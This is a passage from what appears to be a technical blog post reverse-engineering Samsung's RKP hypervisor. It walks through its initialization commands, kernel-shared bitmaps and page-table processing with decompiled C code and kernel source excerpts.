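    u64 vmalloc_start;  /* start of the vmalloc area */
    u64 vmalloc_end;    /* end of the vmalloc area (high_memory) */
    u64 init_mm_pgd;    /* PA of swapper_pg_dir */
    u64 id_map_pgd;     /* PA of idmap_pg_dir */
    u64 zero_pg_addr;   /* PA of empty_zero_page */
    u64 tramp_pgd;      /* PA of tramp_pg_dir */
    u64 tramp_valias;   /* VA of the trampoline page */
    u32 no_fimc_verify; /* related to FIMC firmware verification */
    u64 fimc_phys_addr; /* PA of the FIMC firmware */
    u64 _text;          /* start of the kernel text */
    u64 _etext;         /* end of the kernel text */
    u64 _srodata;       /* start of the kernel rodata */
    u64 _erodata;       /* end of the kernel rodata */
    u32 large_memory;   /* large memory configuration flag */
} rkp_init_t;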

The rkp_init function is called in start_kernel, early in the kernel boot process.

asmlinkage __visible void __init start_kernel(void)
{
    // ...
    rkp_init();
    // ...
}

On the hypervisor side, the command handler simply ensures that it can't be called twice, and calls rkp_start after taking the appropriate lock.

int64_t rkp_cmd_start(saved_regs_t* regs) {
  // ...

  cs_enter(&rkp_start_lock);
  // Make sure RKP is not already started.
  if (rkp_inited) {
    cs_exit(&rkp_start_lock);
    uh_log('L', "rkp.c", 133, "RKP is already started");
    return -1;
  }
  // Call the actual startup function.
  res = rkp_start(regs);
  cs_exit(&rkp_start_lock);
  return res;
}

The rkp_start function saves all the information about the kernel memory layout into global variables. It initializes two memlists, executable_regions which contains all the kernel executable regions (including the kernel text), and dynamic_load_regions which is used for the "dynamic executable loading" feature that won't be detailed in this blog post. It also protects the kernel sections by calling the rkp_paging_init function and processes the user page tables by calling rkp_l1pgt_process_table.

int64_t rkp_start(saved_regs_t* regs) {
  // ...

  // Save the offset between the kernel virtual and physical mappings into `KIMAGE_VOFFSET`.
  KIMAGE_VOFFSET = regs->x3;
  // Convert the address of the `rkp_init_data` structure from a VA to a PA using `rkp_get_pa`.
  rkp_init_data = rkp_get_pa(regs->x2);
  // Check the magic value.
  if (rkp_init_data->magic - 0x5afe0001 >= 2) {
    uh_log('L', "rkp_init.c", 85, "RKP INIT-Bad Magic(%d), %p", regs->x2, rkp_init_data);
    return -1;
  }
  // If it is the test magic value, call `rkp_init_cmd_counts_test` which allows test commands 0x81-0x88 to be called an
  // unlimited number of times.
  if (rkp_init_data->magic == 0x5afe0002) {
    rkp_init_cmd_counts_test();
    rkp_test = 1;
  }
  // Saves the various fields of `rkp_init_data` into global variables.
  INIT_MM_PGD = rkp_init_data->init_mm_pgd;
  ID_MAP_PGD = rkp_init_data->id_map_pgd;
  ZERO_PG_ADDR = rkp_init_data->zero_pg_addr;
  TRAMP_PGD = rkp_init_data->tramp_pgd;
  TRAMP_VALIAS = rkp_init_data->tramp_valias;
  VMALLOC_START = rkp_init_data->vmalloc_start;
  VMALLOC_END = rkp_init_data->vmalloc_end;
  TEXT = rkp_init_data->_text;
  ETEXT = rkp_init_data->_etext;
  TEXT_PA = rkp_get_pa(TEXT);
  ETEXT_PA = rkp_get_pa(ETEXT);
  SRODATA = rkp_init_data->_srodata;
  ERODATA = rkp_init_data->_erodata;
  TRAMP_PGD_PAGE = TRAMP_PGD & 0xfffffffff000;
  INIT_MM_PGD_PAGE = INIT_MM_PGD & 0xfffffffff000;
  LARGE_MEMORY = rkp_init_data->large_memory;
  page_ro = 0;
  page_free = 0;
  s2_breakdown = 0;
  pmd_allocated_by_rkp = 0;
  NO_FIMC_VERIFY = rkp_init_data->no_fimc_verify;
  if (rkp_bitmap_init() < 0) {
    uh_log('L', "rkp_init.c", 150, "Failed to init bitmap");
    return -1;
  }
  // Create a new memlist to contain the list of kernel executable regions.
  memlist_init(&executable_regions);
  memlist_set_unkn_14(&executable_regions);
  // Add the kernel text to the newly created memlist.
  memlist_add(&executable_regions, TEXT, ETEXT - TEXT);
  // Add the `TRAMP_VALIAS` page to the newly created memlist.
  if (TRAMP_VALIAS) {
    memlist_add(&executable_regions, TRAMP_VALIAS, 0x1000);
  }
  // Create a new memlist of dynamically loaded executable regions.
  memlist_init(&dynamic_load_regions);
  memlist_set_unkn_14(&dynamic_load_regions);
  // Call a function that makes the static heap acquire all the unused dynamic memory.
  put_all_dynamic_heap_chunks_in_static_heap();
  // Map and protect various kernel regions in the second stage at EL1, and at EL2.
  if (rkp_paging_init() < 0) {
    uh_log('L', "rkp_init.c", 169, "rkp_pging_init fails");
    return -1;
  }
  // Mark RKP as initialized.
  rkp_inited = 1;
  // Call a function that will process the user page tables.
  if (rkp_l1pgt_process_table(get_ttbr0_el1() & 0xfffffffff000, 0, 1) < 0) {
    uh_log('L', "rkp_init.c", 179, "processing l1pgt fails");
    return -1;
  }
  // Log EL2 system registers values.
  uh_log('L', "rkp_init.c", 183, "[*] HCR_EL2: %lx, SCTLR_EL2: %lx", get_hcr_el2(), get_sctlr_el2());
  uh_log('L', "rkp_init.c", 184, "[*] VTTBR_EL2: %lx, TTBR0_EL2: %lx", get_vttbr_el2(), get_ttbr0_el2());
  uh_log('L', "rkp_init.c", 185, "[*] MAIR_EL1: %lx, MAIR_EL2: %lx", get_mair_el1(), get_mair_el2());
  uh_log('L', "rkp_init.c", 186, "RKP Activated");
  return 0;
}

The rkp_paging_init function unmaps the hypervisor memory from the kernel, marks the kernel text region as TEXT in the phys_map, and makes it read-only from the hypervisor. The swapper_pg_dir is made writable from the hypervisor, whereas the empty_zero_page is made executable by the kernel in the second stage. The kernel text is made executable, and the log region and dynamic heap regions are made read-only from the kernel.

int64_t rkp_paging_init() {
  // ...

  // Ensure the start of the kernel text is page-aligned.
  if (!TEXT || (TEXT & 0xfff) != 0) {
    uh_log('L', "rkp_paging.c", 637, "kernel text start is not aligned, stext : %p", TEXT);
    return -1;
  }
  // Ensure the end of the kernel text is page-aligned.
  if (!ETEXT || (ETEXT & 0xfff) != 0) {
    uh_log('L', "rkp_paging.c", 642, "kernel text end is not aligned, etext : %p", ETEXT);
    return -1;
  }
  // Ensure the kernel text section doesn't contain the hypervisor base address.
  if (TEXT_PA <= get_base() && ETEXT_PA > get_base()) {
    return -1;
  }
  // Unmap the hypervisor memory from the second stage (to make it inaccessible to the kernel).
  if (s2_unmap(0x87000000, 0x200000)) {
    return -1;
  }
  // Set the kernel text section as `TEXT` in the physmap.
  if (rkp_phys_map_set_region(TEXT_PA, ETEXT - TEXT, TEXT) < 0) {
    uh_log('L', "rkp_paging.c", 435, "physmap set failed for kernel text");
    return -1;
  }
  // Set the kernel text section as read-only from the hypervisor.
  if (s1_map(TEXT_PA, ETEXT - TEXT, UNKN1 | READ)) {
    uh_log('L', "rkp_paging.c", 447, "Failed to make VMM S1 range RO");
    return -1;
  }
  // Ensure the `swapper_pg_dir` is not contained within the kernel text section.
  if (INIT_MM_PGD >= TEXT_PA && INIT_MM_PGD < ETEXT_PA) {
    uh_log('L', "rkp_paging.c", 454, "failed to make swapper_pg_dir RW");
    return -1;
  }
  // Set the `swapper_pg_dir` as writable from the hypervisor.
  if (s1_map(INIT_MM_PGD, 0x1000, UNKN1 | WRITE | READ)) {
    uh_log('L', "rkp_paging.c", 454, "failed to make swapper_pg_dir RW");
    return -1;
  }
  rkp_phys_map_lock(ZERO_PG_ADDR);
  // Set the `empty_zero_page` as executable (and writable) in the second stage.
  if (rkp_s2_page_change_permission(ZERO_PG_ADDR, 0 /* read-write */, 1 /* executable */, 1) < 0) {
    uh_log('L', "rkp_paging.c", 462, "Failed to make executable for empty_zero_page");
    return -1;
  }
  rkp_phys_map_unlock(ZERO_PG_ADDR);
  // Make the kernel text section executable for the kernel (note the 0 given as argument).
  if (rkp_set_kernel_rox(0 /* read-write */)) {
    return -1;
  }
  // Set the log region read-only in the second stage.
  if (rkp_s2_range_change_permission(0x87100000, 0x87140000, 0x80 /* read-only */, 1 /* executable */, 1) < 0) {
    uh_log('L', "rkp_paging.c", 667, "Failed to make UH_LOG region RO");
    return -1;
  }
  // Ensure the dynamic heap has been initialized.
  if (!uh_state.dynamic_heap_inited) {
    return 0;
  }
  // Set the dynamic heap region as read-only in the second stage.
  if (rkp_s2_range_change_permission(uh_state.dynamic_heap_base,
                                     uh_state.dynamic_heap_base + uh_state.dynamic_heap_size, 0x80 /* read-only */,
                                     1 /* executable */, 1) < 0) {
    uh_log('L', "rkp_paging.c", 685, "Failed to make dynamic_heap region RO");
    return -1;
  }
  return 0;
}

The rkp_set_kernel_rox function makes the kernel text and rodata sections executable in the second stage, and depending on the access argument, either writable or read-only. When the function is first called, the argument is 0, but it is called again later with 0x80. It also updates the ro_bitmap to mark the kernel rodata section pages as read-only (which is different from the actual page tables).

int64_t rkp_set_kernel_rox(int64_t access) {
  // ...

  // Set the kernel text and rodata sections as executable.
  erodata_pa = rkp_get_pa(ERODATA);
  if (rkp_s2_range_change_permission(TEXT_PA, erodata_pa, access, 1 /* executable */, 1) < 0) {
    uh_log('L', "rkp_paging.c", 392, "Failed to make Kernel range ROX");
    return -1;
  }
  // If the kernel text and rodata sections are read-only in the second stage, return here.
  if (access) {
    return 0;
  }
  // Ensure the end of the kernel text and rodata sections are page-aligned.
  if (((erodata_pa | ETEXT_PA) & 0xfff) != 0) {
    uh_log('L', "rkp_paging.c", 158, "start or end addr is not aligned, %p - %p", ETEXT_PA, erodata_pa);
    return 0;
  }
  // Ensure the end of the kernel text is before the end of the rodata section.
  if (ETEXT_PA > erodata_pa) {
    uh_log('L', "rkp_paging.c", 163, "start addr is bigger than end addr %p, %p", ETEXT_PA, erodata_pa);
    return 0;
  }
  // Mark all the pages belonging to the kernel rodata as read-only in the `ro_bitmap`.
  paddr = ETEXT_PA;
  while (sparsemap_set_value_addr(&uh_state.ro_bitmap, paddr, 1) >= 0) {
    paddr += 0x1000;
    if (paddr >= erodata_pa) {
      return 0;
    }
  }
  uh_log('L', "rkp_paging.c", 171, "set_pgt_bitmap fail, %p", paddr);
  return 0;
}

We mentioned that, after rkp_paging_init, rkp_start also calls rkp_l1pgt_process_table to process the page tables. We will detail the inner workings of this function later, but it is called with the value of the TTBR0_EL1 register and mainly makes its 3 levels of tables read-only.

RKP Deferred Start

On the kernel side, the second startup-related command is called in rkp_deferred_init.

static inline void rkp_deferred_init(void){
    uh_call(UH_APP_RKP, RKP_DEFERRED_START, 0, 0, 0, 0);
}

rkp_deferred_init itself is called by kernel_init, which is later in the kernel boot process.

static int __ref kernel_init(void *unused)
{
    // ...
    rkp_deferred_init();
    // ...
}

On the hypervisor side, the command handler rkp_cmd_deferred_start simply calls rkp_deferred_start. It sets the kernel text section as read-only in the second stage. It also processes the two kernel page tables, swapper_pg_dir and tramp_pg_dir, using the rkp_l1pgt_process_table function.

int64_t rkp_deferred_start() {
  uh_log('L', "rkp_init.c", 193, "DEFERRED INIT START");
  // Set the kernel text section as read-only in the second stage (here the argument is 0x80).
  if (rkp_set_kernel_rox(0x80 /* read-only */)) {
    return -1;
  }
  // Call a function that will process the `swapper_pg_dir` kernel page tables.
  if (rkp_l1pgt_process_table(INIT_MM_PGD, 0x1ffffff, 1) < 0) {
    uh_log('L', "rkp_init.c", 198, "Failed to make l1pgt processing");
    return -1;
  }
  // Call a function that will process the `tramp_pg_dir` kernel page tables.
  if (TRAMP_PGD && rkp_l1pgt_process_table(TRAMP_PGD, 0x1ffffff, 1) < 0) {
    uh_log('L', "rkp_init.c", 204, "Failed to make l1pgt processing");
    return -1;
  }
  // Mark RKP as deferred initialized.
  rkp_deferred_inited = 1;
  uh_log('L', "rkp_init.c", 217, "DEFERRED INIT IS DONE\n");
  memory_fini();
  return 0;
}

RKP Bitmaps

By digging in the kernel sources, we can find 3 more commands that are called by the kernel during startup.

Two of them are still called in rkp_init:

static void __init rkp_init(void)
{
    // ...
    rkp_s_bitmap_ro = (sparse_bitmap_for_kernel_t *)
        uh_call(UH_APP_RKP, RKP_GET_RO_BITMAP, 0, 0, 0, 0);
    rkp_s_bitmap_dbl = (sparse_bitmap_for_kernel_t *)
        uh_call(UH_APP_RKP, RKP_GET_DBL_BITMAP, 0, 0, 0, 0);
    // ...
}

The two commands RKP_GET_RO_BITMAP and RKP_GET_DBL_BITMAP each return a pointer to an instance of sparse_bitmap_for_kernel_t.

typedef struct sparse_bitmap_for_kernel {
    u64 start_addr;
    u64 end_addr;
    u64 maxn;
    char **map;
} sparse_bitmap_for_kernel_t;

The returned pointers are stored in rkp_s_bitmap_ro and rkp_s_bitmap_dbl, respectively.

sparse_bitmap_for_kernel_t* rkp_s_bitmap_ro __rkp_ro = 0;
sparse_bitmap_for_kernel_t* rkp_s_bitmap_dbl __rkp_ro = 0;

They correspond to the hypervisor's ro_bitmap and dbl_bitmap sparsemaps, respectively.

The first one is used to check if a page has been set as read-only by the hypervisor, using the rkp_is_pg_protected function.

static inline u8 rkp_is_pg_protected(u64 va){
    return rkp_check_bitmap(__pa(va), rkp_s_bitmap_ro);
}

The second one is used to check if a page is already mapped and should not be mapped a second time, using the rkp_is_pg_dbl_mapped function.

static inline u8 rkp_is_pg_dbl_mapped(u64 pa){
    return rkp_check_bitmap(pa, rkp_s_bitmap_dbl);
}

Both functions call rkp_check_bitmap, which extracts the bit corresponding to the given physical address from the kernel bitmap.

#define SPARSE_UNIT_BIT (30)
#define SPARSE_UNIT_SIZE (1<<SPARSE_UNIT_BIT)
// ...

static inline u8 rkp_check_bitmap(u64 pa, sparse_bitmap_for_kernel_t *kernel_bitmap){
    u8 val;
    u64 offset, map_loc, bit_offset;
    char *map;

    if(!kernel_bitmap || !kernel_bitmap->map)
        return 0;

    offset = pa - kernel_bitmap->start_addr;
    map_loc = ((offset % SPARSE_UNIT_SIZE) / PAGE_SIZE) >> 3;
    bit_offset = ((offset % SPARSE_UNIT_SIZE) / PAGE_SIZE) % 8;

    if(kernel_bitmap->maxn <= (offset >> SPARSE_UNIT_BIT)) 
        return 0;

    map = kernel_bitmap->map[(offset >> SPARSE_UNIT_BIT)];
    if(!map)
        return 0;

    val = (u8)((*(u64 *)(&map[map_loc])) >> bit_offset) & ((u64)1);
    return val;
}
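As a worked example with hypothetical values: if kernel_bitmap->start_addr is 0x80000000 and pa is 0x80123000, then offset is 0x123000, which falls into chunk 0 (offset >> SPARSE_UNIT_BIT = 0); the page index within that 1 GB chunk is 0x123, so map_loc = 0x123 >> 3 = 0x24 and bit_offset = 0x123 % 8 = 3, and the function returns bit 3 of the byte at offset 0x24 in the first chunk's bitmap.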

RKP_GET_RO_BITMAP and RKP_GET_DBL_BITMAP are handled similarly by the hypervisor, so we will only take a look at the handler for the first one.

rkp_cmd_get_ro_bitmap allocates a sparse_bitmap_for_kernel_t structure from the dynamic heap, zeroes it, and passes it to sparsemap_bitmap_kernel, which fills it with the information of the ro_bitmap. It then puts the VA of the newly allocated structure into X0 and, if a kernel pointer was provided in X2, also writes the VA there (converting the pointer with virt_to_phys_el1 first).

int64_t rkp_cmd_get_ro_bitmap(saved_regs_t* regs) {
  // ...

  // This command cannot be called after RKP has been deferred initialized.
  if (rkp_deferred_inited) {
    return -1;
  }
  // Allocate the bitmap structure that will be returned to the kernel.
  bitmap = dynamic_heap_alloc(0x20, 0);
  if (!bitmap) {
    uh_log('L', "rkp.c", 302, "Fail alloc robitmap for kernel");
    return -1;
  }
  // Reset the newly allocated structure.
  memset(bitmap, 0, sizeof(sparse_bitmap_for_kernel_t));
  // Fill the kernel bitmap with the contents of the hypervisor `ro_bitmap`.
  res = sparsemap_bitmap_kernel(&uh_state.ro_bitmap, bitmap);
  if (res) {
    uh_log('L', "rkp.c", 309, "Fail sparse_map_bitmap_kernel");
    return res;
  }
  // Put the kernel bitmap VA in x0.
  regs->x0 = rkp_get_va(bitmap);
  // Put the kernel bitmap VA in the memory referenced by x2.
  if (regs->x2) {
    *virt_to_phys_el1(regs->x2) = regs->x0;
  }
  uh_log('L', "rkp.c", 322, "robitmap:%p", bitmap);
  return 0;
}

To see how the kernel bitmap is filled from the hypervisor sparsemap, let's look at sparsemap_bitmap_kernel. This function converts the PAs of all the sparsemap entries into VAs before copying them into the sparse_bitmap_for_kernel_t structure.

int64_t sparsemap_bitmap_kernel(sparsemap_t* map, sparse_bitmap_for_kernel_t* kernel_bitmap) {
  // ...

  // Sanity-check the arguments.
  if (!map || !kernel_bitmap) {
    return -1;
  }
  // Copy the start address, end address, and entry count unchanged.
  kernel_bitmap->start_addr = map->start_addr;
  kernel_bitmap->end_addr = map->end_addr;
  kernel_bitmap->maxn = map->count;
  // Allocate from the dynamic heap an array to hold the entries addresses.
  bitmaps = dynamic_heap_alloc(8 * map->count, 0);
  if (!bitmaps) {
    uh_log('L', "sparsemap.c", 202, "kernel_bitmap does not allocated : %lu", map->count);
    return -1;
  }
  // Private sparsemaps are not allowed to be accessed by the kernel.
  if (map->private) {
    uh_log('L', "sparsemap.c", 206, "EL1 doesn't support to get private sparsemap");
    return -1;
  }
  // Zero out the allocated memory.
  memset(bitmaps, 0, 8 * map->count);
  // Save the VA of the allocated array.
  kernel_bitmap->map = (bitmaps - PHYS_OFFSET) | 0xffffffc000000000;
  index = 0;
  do {
    // Store the VAs of the entries into the array.
    bitmap = map->entries[index].bitmap;
    if (bitmap) {
      bitmaps[index] = (bitmap - PHYS_OFFSET) | 0xffffffc000000000;
    }
    ++index;
  } while (index < kernel_bitmap->maxn);
  return 0;
}

The third command is RKP_GET_RKP_GET_BUFFER_BITMAP, and it is called by the kernel in rkp_robuffer_init.

static void __init rkp_robuffer_init(void)
{
    rkp_s_bitmap_buffer = (sparse_bitmap_for_kernel_t *)
        uh_call(UH_APP_RKP, RKP_GET_RKP_GET_BUFFER_BITMAP, 0, 0, 0, 0);
}

It is also used to retrieve a sparsemap, this time the page_allocator.map.

sparse_bitmap_for_kernel_t* rkp_s_bitmap_buffer __rkp_ro = 0;

It is used to check if a page comes from the hypervisor's page allocator using the is_rkp_ro_page function.

static inline unsigned int is_rkp_ro_page(u64 va){
    return rkp_check_bitmap(__pa(va), rkp_s_bitmap_buffer);
}

The 3 commands used for retrieving a sparsemap are all called from the start_kernel function.

asmlinkage __visible void __init start_kernel(void)
{
    // ...
    rkp_robuffer_init();
    // ...
    rkp_init();
    // ...
}

To summarize a little bit, these bitmaps are used by the kernel to check if some data is located on a page that is protected by RKP. If that is the case, the kernel knows it will need to call one of the RKP commands to modify it.
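As an illustration of this pattern, here is a simplified sketch modeled on the set_pte helper found in Samsung kernel sources. The RKP_WRITE_PGT3 command name comes from those sources and is not covered further in this post; the real helper also checks for double mappings and performs the fallback store with an explicit str x2, [x1] sequence, which is the exact instruction pattern that the rkp_fault detection mentioned earlier looks for.

static inline void set_pte(pte_t *ptep, pte_t pte)
{
    /* If the page containing this PTE was made read-only by RKP, the write
     * has to be done by the hypervisor on the kernel's behalf. */
    if (rkp_is_pg_protected((u64)ptep)) {
        uh_call(UH_APP_RKP, RKP_WRITE_PGT3, (u64)ptep, pte_val(pte), 0, 0);
    } else {
        /* Otherwise the page is writable and a plain store is enough. */
        *ptep = pte;
    }
}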

Page Tables Processing

We left it aside for a moment when we saw the calls to rkp_l1pgt_process_table in rkp_start and rkp_deferred_start, but now the time has come to detail how the kernel page tables are processed by the hypervisor. But first, a quick reminder about the layout of the kernel page tables.

Here is the Linux memory layout on Android (using 4 KB pages + 3 levels):

Start           End         Size        Use
-----------------------------------------------------------------------
0000000000000000    0000007fffffffff     512GB      user
ffffff8000000000    ffffffffffffffff     512GB      kernel

And here is the corresponding translation table lookup:

+--------+--------+--------+--------+--------+--------+--------+--------+
|63    56|55    48|47    40|39    32|31    24|23    16|15     8|7      0|
+--------+--------+--------+--------+--------+--------+--------+--------+
 |                 |         |         |         |         |
 |                 |         |         |         |         v
 |                 |         |         |         |   [11:0]  in-page offset
 |                 |         |         |         +-> [20:12] L3 index (PTE)
 |                 |         |         +-----------> [29:21] L2 index (PMD)
 |                 |         +---------------------> [38:30] L1 index (PUD)
 |                 +-------------------------------> [47:39] L0 index (PGD)
 +-------------------------------------------------> [63] TTBR0/1

So keep in mind for this section that the PGD and PUD indexes coincide (PGD = PUD = VA[38:30]), because only 3 levels of address translation are used.
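For reference, here is how these indexes can be extracted from a virtual address; the masks and shifts below match the ones that appear in the decompiled processing functions later in this section (the macro names are ours).

/* Illustration only: translation table indexes for a 39-bit VA,
 * 4 KB granule, 3 levels of address translation. */
#define l1_index(va)    (((va) >> 30) & 0x1ff)  /* PGD/PUD index, VA[38:30] */
#define l2_index(va)    (((va) >> 21) & 0x1ff)  /* PMD index, VA[29:21] */
#define l3_index(va)    (((va) >> 12) & 0x1ff)  /* PTE index, VA[20:12] */
#define page_offset(va) ((va) & 0xfff)          /* in-page offset, VA[11:0] */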

Here are the formats of the level 0, level 1, and level 2 descriptors (that can be invalid, block or table descriptors):

[Image: formats of the level 0, 1, and 2 descriptors]

Here are the formats of the level 3 descriptors (which can be invalid or page descriptors):

[Image: formats of the level 3 descriptors]

First Level

Processing of the first level tables (or PGDs) is done by the rkp_l1pgt_process_table function. A kernel PGD must be either swapper_pg_dir or tramp_pg_dir, and RKP must not yet have been deferred initialized; otherwise a policy violation is triggered. The user PGD idmap_pg_dir is never processed by this function.

If the PGD is being introduced, it is marked as L1 in the physmap and made read-only in the second stage. If the PGD is being retired, it is marked as FREE in the physmap and made writable in the second stage.

Finally, the descriptors of the PGD are processed: table descriptors are passed to the rkp_l2pgt_process_table function and have their PXN bit set if this was a user PGD, and block descriptors have their PXN bit set regardless of the PGD type.

int64_t rkp_l1pgt_process_table(int64_t pgd, uint32_t high_bits, uint32_t is_alloc) {
  // ...

  // If this is a kernel PGD.
  if (high_bits == 0x1ffffff) {
    // It should be either `swapper_pg_dir` or `tramp_pg_dir`, or RKP should not be deferred initialized.
    if (pgd != INIT_MM_PGD && (!TRAMP_PGD || pgd != TRAMP_PGD) || rkp_deferred_inited) {
      // If it is not, we trigger a policy violation that results in a panic.
      rkp_policy_violation("only allowed on kerenl PGD or tramp PDG! l1t : %lx", pgd);
      return -1;
    }
  } else {
    // If it is a user PGD and it is `idmap_pg_dir`, return without processing it.
    if (ID_MAP_PGD == pgd) {
      return 0;
    }
  }
  rkp_phys_map_lock(pgd);
  // If we are introducing this PGD.
  if (is_alloc) {
    // If it is already marked as a PGD in the physmap, return without processing it.
    if (is_phys_map_l1(pgd)) {
      rkp_phys_map_unlock(pgd);
      return 0;
    }
    // Compute the correct type (`KERNEL` or not).
    if (high_bits) {
      type = KERNEL | L1;
    } else {
      type = L1;
    }
    // And mark the PGD as such in the physmap.
    res = rkp_phys_map_set(pgd, type);
    if (res < 0) {
      rkp_phys_map_unlock(pgd);
      return res;
    }
    // Make the PGD read-only in the second stage.
    res = rkp_s2_page_change_permission(pgd, 0x80 /* read-only */, 0 /* non-executable */, 0);
    if (res < 0) {
      uh_log('L', "rkp_l1pgt.c", 63, "Process l1t failed, l1t addr : %lx, op : %d", pgd, 1);
      rkp_phys_map_unlock(pgd);
      return res;
    }
  }
  // If we are retiring this PGD.
  else {
    // If it is not marked as a PGD in the physmap, return without processing it.
    if (!is_phys_map_l1(pgd)) {
      rkp_phys_map_unlock(pgd);
      return 0;
    }
    // Mark the PGD as `FREE` in the physmap.
    res = rkp_phys_map_set(pgd, FREE);
    if (res < 0) {
      rkp_phys_map_unlock(pgd);
      return res;
    }
    // Make the PGD writable in the second stage.
    res = rkp_s2_page_change_permission(pgd, 0 /* writable */, 1 /* executable */, 0);
    if (res < 0) {
      uh_log('L', "rkp_l1pgt.c", 80, "Process l1t failed, l1t addr : %lx, op : %d", pgd, 0);
      rkp_phys_map_unlock(pgd);
      return res;
    }
  }
  // Now iterate over each descriptor of the PGD.
  offset = 0;
  entry = 0;
  start_addr = high_bits << 39;
  do {
    desc_p = pgd + entry;
    desc = *desc_p;
    // Block descriptor (not a table, not invalid).
    if ((desc & 0b11) != 0b11) {
      if (desc) {
        // Make the memory non executable at EL1.
        set_pxn_bit_of_desc(desc_p, 1);
      }
    }
    // Table descriptor.
    else {
      addr = start_addr & 0xffffff803fffffff | offset;
      // Call rkp_l2pgt_process_table to process the PMD.
      res += rkp_l2pgt_process_table(desc & 0xfffffffff000, addr, is_alloc);
      // Make the memory non executable at EL1 for user PGDs.
      if (!(start_addr >> 39)) {
        set_pxn_bit_of_desc(desc_p, 1);
      }
    }
    entry += 8;
    offset += 0x40000000;
    start_addr = addr;
  } while (entry != 0x1000);
  rkp_phys_map_unlock(pgd);
  return res;
}

Second Level

Processing of the second level tables (or PMDs) is done by the rkp_l2pgt_process_table function. The first time it is called with a user PMD, it checks whether that PMD was allocated by the hypervisor page allocator; if it was not, user PMDs are never processed by this function.

If the PMD is being introduced, it is marked as L2 in the physmap and made read-only in the second stage. Kernel PMDs are never allowed to be retired. If a user PMD is being retired, it is marked as FREE in the physmap and made writable in the second stage.

Finally, the descriptors of the PMD are processed: all descriptors are passed to the check_single_l2e function.

int64_t rkp_l2pgt_process_table(int64_t pmd, uint64_t start_addr, uint32_t is_alloc) {
  // ...

  // If this is a user PMD.
  if (!(start_addr >> 39)) {
    // The first time this function is called, determine if the PMD was allocated by the hypervisor page allocator. The
    // default value of `pmd_allocated_by_rkp` is 0, 1 means "process the PMD", -1 means "don't process it".
    if (!pmd_allocated_by_rkp) {
      if (page_allocator_is_allocated(pmd) == 1) {
        pmd_allocated_by_rkp = 1;
      } else {
        pmd_allocated_by_rkp = -1;
      }
    }
    // If the PMD was not allocated by RKP, return without processing it.
    if (pmd_allocated_by_rkp == -1) {
      return 0;
    }
  }
  rkp_phys_map_lock(pmd);
  // If we are introducing this PMD.
  if (is_alloc) {
    // If it is already marked as a PMD in the physmap, return without processing it.
    if (is_phys_map_l2(pmd)) {
      rkp_phys_map_unlock(pmd);
      return 0;
    }
    // Compute the correct type (`KERNEL` or not).
    if (start_addr >> 39) {
      type = KERNEL | L2;
    } else {
      type = L2;
    }
    // And mark the PMD as such in the physmap.
    res = rkp_phys_map_set(pmd, (start_addr >> 23) & 0xff80 | type);
    if (res < 0) {
      rkp_phys_map_unlock(pmd);
      return res;
    }
    // Make the PMD read-only in the second stage.
    res = rkp_s2_page_change_permission(pmd, 0x80 /* read-only */, 0 /* non-executable */, 0);
    if (res < 0) {
      uh_log('L', "rkp_l2pgt.c", 98, "Process l2t failed, %lx, %d", pmd, 1);
      rkp_phys_map_unlock(pmd);
      return res;
    }
  }
  // If we are retiring this PMD.
  else {
    // If it is not marked as a PMD in the physmap, return without processing it.
    if (!is_phys_map_l2(pmd)) {
      rkp_phys_map_unlock(pmd);
      return 0;
    }
    // Kernel PMDs are not allowed to be retired.
    if (start_addr >= 0xffffff8000000000) {
      rkp_policy_violation("Never allow free kernel page table %lx", pmd);
    }
    // Also check that it is not marked `KERNEL` in the physmap.
    if (is_phys_map_kernel(pmd)) {
      rkp_policy_violation("Entry must not point to kernel page table %lx", pmd);
    }
    // Mark the PMD as `FREE` in the physmap.
    res = rkp_phys_map_set(pmd, FREE);
    if (res < 0) {
      rkp_phys_map_unlock(pmd);
      return 0;
    }
    // Make the PMD writable in the second stage.
    res = rkp_s2_page_change_permission(pmd, 0 /* writable */, 1 /* executable */, 0);
    if (res < 0) {
      uh_log('L', "rkp_l2pgt.c", 123, "Process l2t failed, %lx, %d", pmd, 0);
      rkp_phys_map_unlock(pmd);
      return 0;
    }
  }
  // Now iterate over each descriptor of the PMD.
  offset = 0;
  for (i = 0; i != 0x1000; i += 8) {
    addr = offset | start_addr & 0xffffffffc01fffff;
    // Call `check_single_l2e` on each descriptor.
    res += check_single_l2e(pmd + i, addr, is_alloc);
    offset += 0x200000;
  }
  rkp_phys_map_unlock(pmd);
  return res;
}

check_single_l2e processes each PMD descriptor. If the descriptor is mapping a VA that is executable, the PMD is not allowed to be retired. If it is being introduced, then the hypervisor will protect the next level table. If the VA is not executable, the PXN bit of the descriptor is set.

If the descriptor is a block descriptor, no further processing is performed. However, if it is a table descriptor, then the rkp_l3pgt_process_table function is called to process the next level table.

int64_t check_single_l2e(int64_t* desc_p, uint64_t start_addr, signed int32_t is_alloc) {
  // ...

  // If the virtual address mapped by this descriptor is executable (it is in the `executable_regions` memlist).
  if (executable_regions_contains(start_addr, 2)) {
    // The PMD is not allowed to be retired, trigger a policy violation.
    if (!is_alloc) {
      uh_log('L', "rkp_l2pgt.c", 36, "RKP_61acb13b %lx, %lx", desc_p, *desc_p);
      uh_log('L', "rkp_l2pgt.c", 37, "RKP_4083e222 %lx, %d, %d", start_addr, (start_addr >> 30) & 0x1ff,
             (start_addr >> 21) & 0x1ff);
      rkp_policy_violation("RKP_d60f7274");
    }
    // The PMD is being allocated, set the protect flag (to protect the next level table).
    protect = 1;
  } else {
    // The virtual address is not executable, set the PXN bit of the descriptor.
    set_pxn_bit_of_desc(desc_p, 2);
    // Unset the protect flag (we don't need to protect the next level table).
    protect = 0;
  }
  // Get the descriptor type.
  desc = *desc_p;
  type = desc & 0b11;
  // Block descriptor, return without processing it.
  if (type == 0b01) {
    return 0;
  }
  // Invalid descriptor, return without processing it.
  if (type != 0b11) {
    if (desc) {
      uh_log('L', "rkp_l2pgt.c", 64, "Invalid l2e %p %p %p", desc, is_alloc, desc_p);
    }
    return 0;
  }
  // Table descriptor, log if the PT needs to be protected.
  if (protect) {
    uh_log('L', "rkp_l2pgt.c", 56, "L3 table to be protected, %lx, %d, %d", desc, (start_addr >> 21) & 0x1ff,
           (start_addr >> 30) & 0x1ff);
  }
  // If the kernel PMD is being retired, log as well.
  if (!is_alloc && start_addr >= 0xffffff8000000000) {
    uh_log('L', "rkp_l2pgt.c", 58, "l2 table FREE-1 %lx, %d, %d", *desc_p, (start_addr >> 30) & 0x1ff,
           (start_addr >> 21) & 0x1ff);
    uh_log('L', "rkp_l2pgt.c", 59, "l2 table FREE-2 %lx, %d, %d", desc_p, 0x1ffffff, 0);
  }
  // Call rkp_l3pgt_process_table to process the PT.
